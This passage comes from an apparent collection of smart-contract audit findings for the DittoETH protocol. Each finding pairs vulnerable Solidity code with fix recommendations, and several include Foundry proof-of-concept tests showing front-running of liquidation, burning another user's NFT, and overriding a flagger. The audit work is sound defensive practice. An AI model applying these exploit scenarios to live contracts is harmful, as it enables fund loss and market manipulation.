Constants.SHORT_STARTING_ID);\\n\\n        //set cRatio below 1.1\\n        setETH(700 ether);\\n        \\n        //Alice is still blocking all attempts to flag her short by transferring it to her secondary address, front-running Bob\\n        vm.prank(alice);\\n        diamond.transferFrom(alice, aliceSecondAddr, 1);\\n        vm.prank(bob);\\n        vm.expectRevert(Errors.InvalidShortId.selector);\\n        diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n\\n        //Alice front-runs Bob again and transfers the NFT to a third address she owns\\n        vm.prank(aliceSecondAddr);\\n        diamond.transferFrom(aliceSecondAddr, aliceThirdAddr, 1);\\n\\n        //Bob tries again on the new address, but his attempt reverts because the transfer of the short by Alice changed the short status to SR.Cancelled\\n        STypes.ShortRecord memory shortRecord = getShortRecord(aliceSecondAddr, Constants.SHORT_STARTING_ID);\\n        depositUsd(bob, shortRecord.ercDebt);\\n        vm.expectRevert(Errors.MarginCallSecondaryNoValidShorts.selector);\\n        liquidateErcEscrowed(aliceSecondAddr, Constants.SHORT_STARTING_ID, DEFAULT_AMOUNT, bob);\\n    }\\n```\\n
Owner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidation\\nConsider checking the collateral ratio inside `transferShortRecord` and reverting when the short is below `primaryLiquidationCR`, so that a transfer cannot be used to dodge flagging or secondary liquidation (see the sketch below).
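A minimal sketch of such a guard, reusing helpers that already appear in the codebase (`getCollateralRatioSpotPrice`, `getSavedOrSpotOraclePrice`, `primaryLiquidationCR`); the error name is an assumption:\\n```\\n// Inside transferShortRecord, before the record is deleted and re-created:\\nif (\\n    short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n        < LibAsset.primaryLiquidationCR(asset)\\n) {\\n    revert Errors.CannotTransferUndercollateralizedShort(); // hypothetical error\\n}\\n```\\n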
Because of this, a shorter could maintain the dangerous position (or multiple dangerous positions), while putting the protocol at risk.
```\\n    function test_audit_frontrunFlagShort() public {\\n        address alice = makeAddr("Alice"); //Alice will front-run Bob's attempt to flag her short\\n        address aliceSecondAddr = makeAddr("AliceSecondAddr");\\n        address bob = makeAddr("Bob"); //Bob will try to flag Alice's short \\n        address randomUser = makeAddr("randomUser"); //regular user who created a bid order\\n        \\n        //A random user creates a bid, Alice creates a short, which will match with the user's bid\\n        fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n        fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n        //Alice then mints the NFT associated with the SR so that it can be transferred\\n        vm.prank(alice);\\n        diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n        //ETH price drops from 4000 to 2666, making Alice's short flaggable because it is < LibAsset.primaryLiquidationCR(asset)\\n        setETH(2666 ether);\\n        \\n        // Alice saw Bob's attempt to flag her short, so she front-runs him and transfers the SR\\n        vm.prank(alice);\\n        diamond.transferFrom(alice, aliceSecondAddr, 1);\\n        \\n        //Bob's attempt reverts because the transfer of the short by Alice changed the short status to SR.Cancelled\\n        vm.prank(bob);\\n        vm.expectRevert(Errors.InvalidShortId.selector);\\n        diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n    } \\n```\\n
Previous NFT owner can burn NFT from the new owner
high
Short records can be transferred as NFTs. Internally, the short record is deleted from the sender and re-created for the new owner (receiver). However, the `tokenId` of the deleted short record is not reset, allowing the previous NFT owner to burn the NFT from the new owner.\\nShort positions, i.e., short records, can be represented as an NFT (ERC-721) with a specific `tokenId`, storing the reference to the short record id in the `shortRecordId` property of the `nftMapping` mapping.\\nSuch a short record can be transferred to another address by sending the NFT to the new owner. Internally, when transferring the ERC-721 token, the `transferShortRecord` function is called (e.g., in line 162 of the `ERC721Facet.transferFrom` function).\\nThe `transferShortRecord` function first validates if the short record is transferable (e.g., not flagged and not canceled) and then calls the `deleteShortRecord` function in line 132 to delete the short record from the `shortRecords` mapping. Thereafter, a new short record with the values of the transferred short record is created with the new owner as the shorter, and the `nftMapping` struct is updated accordingly.\\ncontracts/libraries/LibShortRecord.sol#L132\\n```\\nfunction transferShortRecord(\\n    address asset,\\n    address from,\\n    address to,\\n    uint40 tokenId,\\n    STypes.NFT memory nft\\n) internal {\\n    AppStorage storage s = appStorage();\\n    STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n    if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n    if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n    uint8 id = createShortRecord(\\n        asset,\\n        to,\\n        SR.FullyFilled,\\n        short.collateral,\\n        short.ercDebt,\\n        short.ercDebtRate,\\n        short.zethYieldRate,\\n        tokenId\\n    );\\n    if (id == Constants.SHORT_MAX_ID) {\\n        revert Errors.ReceiverExceededShortRecordLimit();\\n    }\\n    s.nftMapping[tokenId].owner = to;\\n    s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n\\nHowever, the `LibShortRecord.deleteShortRecord` function neglects to reset and delete the short record's `tokenId`, which is initially set to the `tokenId` of the newly minted NFT in the `ERC721Facet.mintNFT` function. Consequently, upon transferring the short record, the deleted short record still references the transferred NFT's `tokenId`, in addition to the new short record which also references the same `tokenId`. Thus, two short records (with different owners), one of them even deleted, reference the same NFT token.\\nThis oversight leads to the following issues (with number 3 being the most severe):\\nThe `ERC721Facet.balanceOf` function will report an incorrect NFT token balance for the previous NFT owner: If the short record was only partially filled before transferring it as an NFT, the remaining short record can still be fully filled, resetting the `SR.Cancelled` status. 
This will cause the `balanceOf` function to include this short record, and due to the short record still referencing the transferred NFT's `tokenId`, this NFT is still counted as owned by the previous owner.\\nThe previous NFT owner can not tokenize the remaining short record: As the `tokenId` of the deleted short record is not reset, the previous owner can not tokenize the remaining short record, as any attempt to mint a new NFT via the `ERC721Facet.mintNFT` function will revert with the `Errors.AlreadyMinted` error.\\nThe previous NFT owner can burn the NFT from the new owner: As the `tokenId` of the deleted and partially filled short record is not reset, the short can be fully filled, resetting the `SR.Cancelled` status. By subsequently combining this short with another short using the `ShortRecordFacet.combineShorts` function, the combined shorts will have their associated NFT burned.\\nPlease note that the owner of the transferred short record can re-mint an NFT for the short via `ERC721Facet.mintNFT`, but if the owner is a contract, the contract may lack the required functionality to do so.\\nThe following test case demonstrates issue 3 outlined above:\\n
Consider resetting the `tokenId` of the deleted short record in the `LibShortRecord.deleteShortRecord` function.
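A minimal sketch of that fix; the surrounding cancellation and linked-list cleanup of `deleteShortRecord` is elided, and the exact struct fields are assumptions based on the snippets above:\\n```\\nfunction deleteShortRecord(address asset, address shorter, uint8 id) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][shorter][id];\\n // ... existing cancellation / linked-list cleanup ...\\n // Clear the NFT reference so the stale record no longer points at the transferred token\\n short.tokenId = 0;\\n}\\n```\\nWith the `tokenId` cleared, the deleted record can no longer be used to re-mint, miscount, or burn the NFT now held by the receiver.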
The previous NFT owner can burn the NFT from the new owner.\\nIf this NFT transfer was part of a trade and, for instance, sent to an escrow contract, the previous NFT owner can burn the NFT from the escrow contract, while the escrow contract lacks the functionality to re-mint the NFT for the short record. This renders the short record unusable, and funds (collateral) associated with the short record are lost.
```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n
Instant arbitrage opportunity through rETH and stETH price discrepancy
low
Users can choose to withdraw their zETH as either rETH or stETH. Since in reality most users will choose whichever is worth more at that moment, instant arbitrage becomes possible, and the resulting imbalance drains one pool over the other.\\nIn DittoETH, two special types of Ethereum tokens are accepted: rETH and stETH. These tokens are based on regular ETH and are designed to stay close in value to one regular Ether; in reality, however, they can have slightly different values. rETH, stETH.\\nIn practice, when users want to withdraw, they can choose between rETH and stETH based on which one is worth more at that moment. The system does not track which one a user put in when they first deposited.\\nNow, here's where it gets interesting. Because rETH and stETH can have slightly different values, a savvy user could deposit the cheaper one, get zETH, and then withdraw the more valuable of rETH and stETH: a quick way to make some extra profit.\\nAs we can see on lines 110-112, the rETH or stETH withdrawn depends on `ethAmount`, which `_ethConversion` computes as if rETH and stETH were worth exactly the same\\n```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\n
Consider using an oracle to adjust for the price difference between rETH and stETH.
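One hedged sketch of such an adjustment; the `bridgeTokenPrice` oracle helper is hypothetical and not part of the current codebase, and the fixed-point helpers mirror the `_ethConversion` snippet above:\\n```\\nfunction _ethConversionWithOracle(uint256 vault, uint88 amount, address bridge)\\n private\\n view\\n returns (uint88)\\n{\\n // ETH value owed for the burned zETH, as computed today\\n uint88 baseAmount = _ethConversion(vault, amount);\\n // Hypothetical oracle helper: ETH per one unit of the bridge's LST, 18 decimals\\n uint256 lstPrice = bridgeTokenPrice(bridge);\\n // Convert the ETH value into LST units, so a pricier LST yields fewer units\\n return baseAmount.divU88(lstPrice);\\n}\\n```\\nWith this shape, withdrawing via the more valuable bridge no longer hands out more value than the zETH burned, removing the arbitrage.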
The instant arbitrage opportunity created by the rETH/stETH price discrepancy will also cause an imbalance between the rETH and stETH pools.
```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\n
Division before multiplication results in lower `dittoMatchedShares` distributed to users
medium
The shares amount is rounded down to a whole number of days staked. The maximum truncation is just under 1 day and the minimum match time is 14 days, so at most 1 / 14 * 100% = 7.1% of accrued shares will be truncated.\\nDivision before multiplication:\\n```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n\\nSuppose `timeTillMatch = 14.99 days` and `eth = 1e18`. The expected result is `14.99 * 1e18 / 1 = 14.99e18 shares`. The actual result is `1e18 * (14.99 / 1) = 14e18 shares`, because the integer division truncates first.
```\\n- uint88 shares = eth * (timeTillMatch / 1 days);\\n+ uint88 shares = uint88(uint256(eth * timeTillMatch) / 1 days);\\n```\\n
Up to 7.1% of a user's shares will be truncated
```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n
Using a cached price in the critical shutdownMarket()
medium
The `MarketShutdownFacet::shutdownMarket()` is a critical function allowing anyone to freeze the market permanently. The function determines whether or not the market will be frozen based on the asset collateral ratio calculated from a cached price, which can be outdated (too risky for this critical function).\\nOnce the market is frozen, no one can unfreeze it.\\nThe `shutdownMarket()` allows anyone to freeze the market permanently once the asset collateral ratio threshold (default of 1.1 ether) has been reached. Once the market is frozen, all shorters will lose access to their positions. Even the protocol's DAO or admin cannot unfreeze the market. Therefore, the `shutdownMarket()` becomes one of the most critical functions.\\nTo calculate the asset collateral ratio (cRatio), the `shutdownMarket()` executes the `_getAssetCollateralRatio()`. However, the `_getAssetCollateralRatio()` calculates the `cRatio` using the cached price loaded from the `LibOracle::getPrice()`.\\nUsing the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated. The function should consider only a fresh price queried from Chainlink.\\n```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L36\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L37\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L44\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L99
Using a cached price in the critical shutdownMarket()\\nThe `shutdownMarket()` requires the most accurate price, not just a cached price. Call `LibOracle::getOraclePrice()` to get a fresh price from Chainlink.
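A minimal sketch of the change, reusing the `getOraclePrice()` helper referenced elsewhere in this report:\\n```\\nfunction _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n{\\n STypes.Asset storage Asset = s.asset[asset];\\n // Query Chainlink directly instead of relying on the cached price\\n return Asset.zethCollateral.div(LibOracle.getOraclePrice(asset).mul(Asset.ercDebt));\\n}\\n```\\n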
Using the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated.\\nOnce the market is frozen, all shorters will lose access to their positions. Even the protocol's DAO or admin cannot unfreeze the market.
```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n
Malicious trader can intentionally obtain `dittoMatchedShares` in some edge cases
low
A malicious trader can intentionally obtain `dittoMatchedShares` by creating a bid order at a low price that nobody will ask at, waiting for more than 14 days, and then creating an ask order at the same low price, causing `dittoMatchedShares` to be credited to himself.\\nA malicious trader can create a bid order using the BidOrdersFacet::createBid() function at a very low price, wait the minimum number of days required to earn `dittoMatchedShares`, and then place an `ask` order at the bid's low price. Please consider the next scenario:\\n```\\nMarket status:\\nassetX: current price 100\\n```\\n\\nThe malicious trader creates the `bid order` for `assetX` at `price: 10` (low compared to the current price of 100) and `ercAmount 10`. The price is low because nobody wants to sell at that level, so the order can stay in the book without being matched.\\nThe `bid order` will be submitted to the order book because there are no `asks/sells` to fill at that price.\\nThe malicious trader waits for more than 14 days. Additionally, the malicious trader needs to wait until there are no `asks/sells` in the order book.\\nOnce step 3 is satisfied, the malicious trader creates the `ask order` at `price 10` and `ercAmount 10` (the bid's price from step 1). The order is matched with the `bid order` from step 1 and `dittoMatchedShares` are assigned to the malicious trader.\\nIt is a narrow edge case because the malicious trader needs an empty `ask/sells` order book to place his own `ask order` at the malicious bid's price, but for assets that are not heavily traded the malicious actor can benefit from this.
Verify that the address behind the `bid order` is not the same address that is creating the `ask` order.
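A hedged sketch of that check in the matching path; the struct fields and the `Errors.SelfMatch` error are illustrative, not actual protocol identifiers:\\n```\\n// Inside the matching loop, before crediting time-based dittoMatchedShares\\nif (incomingAsk.addr == matchedBid.addr) {\\n // Self-match: block time-based share accrual (or revert, per protocol preference)\\n revert Errors.SelfMatch();\\n}\\n```\\nAlternatively, only the shares accrual can be skipped for self-matches, so that legitimate self-trades still settle.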
A malicious actor can intentionally obtain `dittoMatchedShares` using `bid/ask` orders that he intentionally crafts. Since the `bid` and `ask` orders are created by the same malicious actor, he won't lose assets.
```\\nMarket status:\\nassetX: current price 100\\n```\\n
Primary liquidation fee distribution may revert due to the inability to cover the caller fees
medium
Fee distribution during the primary short liquidation may revert due to an arithmetic underflow error in case the TAPP's escrowed ETH balance is insufficient to cover the caller (liquidator) fees.\\nDuring the primary liquidation, the `_marginFeeHandler` function called in line 126 handles the fee distribution for the liquidator (i.e., caller).\\nIf the eligible caller fee (callerFee) is less than or equal to the ETH escrowed by the TAPP, the fee is deducted from `TAPP.ethEscrowed` and added to the liquidator's escrowed ETH balance, `VaultUser.ethEscrowed`, in lines 271-274.\\nOtherwise, if the TAPP's escrowed ETH is insufficient to cover the caller fees, i.e., the `else` branch in line 274, the caller is given the `tappFee` instead of the `gasFee`.\\nHowever, if `m.totalFee` exceeds the TAPP's `ethEscrowed`, it reverts with an arithmetic underflow error in line 278. This can be the case if the TAPP has little to no ETH escrowed after placing the forced bid as part of the liquidation, attempting to buy the debt token amount required to repay the short position's debt. In case the short's collateral is not sufficient to buy the debt tokens, the TAPP's escrowed ETH is utilized as well, potentially depleting it.\\nConsequently, the remaining `TAPP.ethEscrowed` is potentially lower than the calculated `m.totalFee`, resulting in the arithmetic underflow error in line 278.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L278\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n
Primary liquidation fee distribution may revert due to the inability to cover the caller fees\\nConsider checking if the TAPP's `ethEscrowed` is sufficient to cover the `m.totalFee` before deducting the fee from the TAPP's `ethEscrowed` balance and if not, give the caller the TAPP's `ethEscrowed` balance.
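A minimal sketch of one way to realize that suggestion inside the `else` branch; the accounting of any remaining shortfall is left out and would need a protocol-level decision:\\n```\\n} else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n // Cap the deduction at the TAPP's remaining balance to avoid the underflow revert\\n if (TAPP.ethEscrowed >= m.totalFee) {\\n TAPP.ethEscrowed -= m.totalFee;\\n } else {\\n TAPP.ethEscrowed = 0;\\n }\\n}\\n```\\n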
The primary short liquidation fails, requiring liquidators to wait until the short position's collateral is sufficient to buy the debt tokens or the TAPP has sufficient collateral; or, if the short's collateral ratio decreases further, the short position is liquidated via the secondary liquidation (which adds additional risk to the peg of the asset, as the overall collateral ratio could fall below 100%).
```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n
Flag can be overridden by another user
high
The `setFlagger` function allows a new flagger to reuse a `flaggerHint` flag id once `LibAsset.firstLiquidationTime` has passed since the flagId was updated.\\n```\\n function setFlagger(\\n STypes.ShortRecord storage short,\\n address cusd,\\n uint16 flaggerHint\\n ) internal {\\n\\n if (flagStorage.g_flaggerId == 0) {\\n address flaggerToReplace = s.flagMapping[flaggerHint];\\n\\n // @audit if timeDiff > firstLiquidationTime, replace the flagger address\\n\\n uint256 timeDiff = flaggerToReplace != address(0)\\n ? LibOrders.getOffsetTimeHours()\\n - s.assetUser[cusd][flaggerToReplace].g_updatedAt\\n : 0;\\n //@dev re-use an inactive flaggerId\\n if (timeDiff > LibAsset.firstLiquidationTime(cusd)) {\\n delete s.assetUser[cusd][flaggerToReplace].g_flaggerId;\\n short.flaggerId = flagStorage.g_flaggerId = flaggerHint;\\n\\n // more code\\n\\n s.flagMapping[short.flaggerId] = msg.sender;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L377-L404C13\\nSince the previous flagger can only liquidate the flagged short after `LibAsset.firstLiquidationTime` has passed, the flagged short remains unliquidated until that time. The first flagger's window to liquidate and the ability to replace the first flagger both open at the same instant. This allows a new flagger to take control over the liquidation of the flagged short by finding some other liquidatable short and passing in the flagId of the previous flagger as the `flagHint`.\\nPOC Test\\n```\\ndiff --git a/test/MarginCallFlagShort.t.sol b/test/MarginCallFlagShort.t.sol\\nindex 906657e..3d7f985 100644\\n--- a/test/MarginCallFlagShort.t.sol\\n+++ b/test/MarginCallFlagShort.t.sol\\n@@ -169,6 +169,90 @@ contract MarginCallFlagShortTest is MarginCallHelper {\\n         assertEq(diamond.getFlagger(shortRecord.flaggerId), extra);\\n     }\\n \\n+    function test_FlaggerId_Override_Before_Call() public {\\n+        address flagger1 = address(77);\\n+        address flagger2 = address(78);\\n+\\n+        vm.label(flagger1, "flagger1");\\n+        vm.label(flagger2, "flagger2");\\n+\\n+        //create first short\\n+        fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n+        fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n+        STypes.ShortRecord memory shortRecord1 =\\n+            diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID);\\n+\\n+        assertEq(diamond.getFlaggerIdCounter(), 1);\\n+        assertEq(shortRecord1.flaggerId, 0);\\n+        assertEq(diamond.getFlagger(shortRecord1.flaggerId), address(0));\\n+\\n+        //flag first short\\n+        setETH(2500 ether);\\n+        vm.prank(flagger1);\\n+        diamond.flagShort(asset, sender, shortRecord1.id, Constants.HEAD);\\n+        shortRecord1 = diamond.getShortRecord(asset, sender, shortRecord1.id);\\n+\\n+        assertEq(diamond.getFlaggerIdCounter(), 2);\\n+        assertEq(shortRecord1.flaggerId, 1);\\n+        assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger1);\\n+\\n+        skip(TEN_HRS_PLUS);\\n+        setETH(2500 ether);\\n+\\n+        //attempting direct liquidation by flagger2 fails since only allowed to flagger1\\n+\\n+        //add ask order to liquidate against\\n+        fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n+\\n+        uint16[] memory shortHintArray = setShortHintArray();\\n+        vm.prank(flagger2);\\n+        vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n+        diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n+\\n+        //cancel the previously created ask order\\n+        fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n+\\n+        //reset\\n+        setETH(4000 ether);\\n+\\n+        //create another short\\n+        fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n+        fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n+        STypes.ShortRecord memory shortRecord2 =\\n+            diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID + 1);\\n+\\n+        assertEq(diamond.getFlaggerIdCounter(), 2);\\n+        assertEq(shortRecord2.flaggerId, 0);\\n+        assertEq(diamond.getFlagger(shortRecord2.flaggerId), address(0));\\n+\\n+        //flag second short by providing flagger id of flagger1. this resets the flagger id\\n+        setETH(2500 ether);\\n+        vm.prank(flagger2);\\n+        diamond.flagShort(\\n+            asset, sender, Constants.SHORT_STARTING_ID + 1, uint16(shortRecord1.flaggerId)\\n+        );\\n+        shortRecord2 =\\n+            diamond.getShortRecord(asset, sender, Constants.SHORT_STARTING_ID + 1);\\n+\\n+        //flagger1 has been replaced\\n+        assertEq(diamond.getFlaggerIdCounter(), 2);\\n+        assertEq(shortRecord2.flaggerId, 1);\\n+        assertEq(diamond.getFlagger(shortRecord2.flaggerId), flagger2);\\n+        assertEq(diamond.getFlagger(shortRecord1.flaggerId), flagger2);\\n+\\n+        //ask to liquidate against\\n+        fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n+\\n+        //now flagger1 cannot liquidate shortRecord1\\n+        vm.prank(flagger1);\\n+        vm.expectRevert(Errors.MarginCallIneligibleWindow.selector);\\n+        diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n+\\n+        //but flagger2 can\\n+        vm.prank(flagger2);\\n+        diamond.liquidate(asset, sender, shortRecord1.id, shortHintArray);\\n+    }\\n+\\n     function test_FlagShort_FlaggerId_Recycling_AfterIncreaseCollateral() public {\\n         createAndFlagShort();\\n \\n```\\n
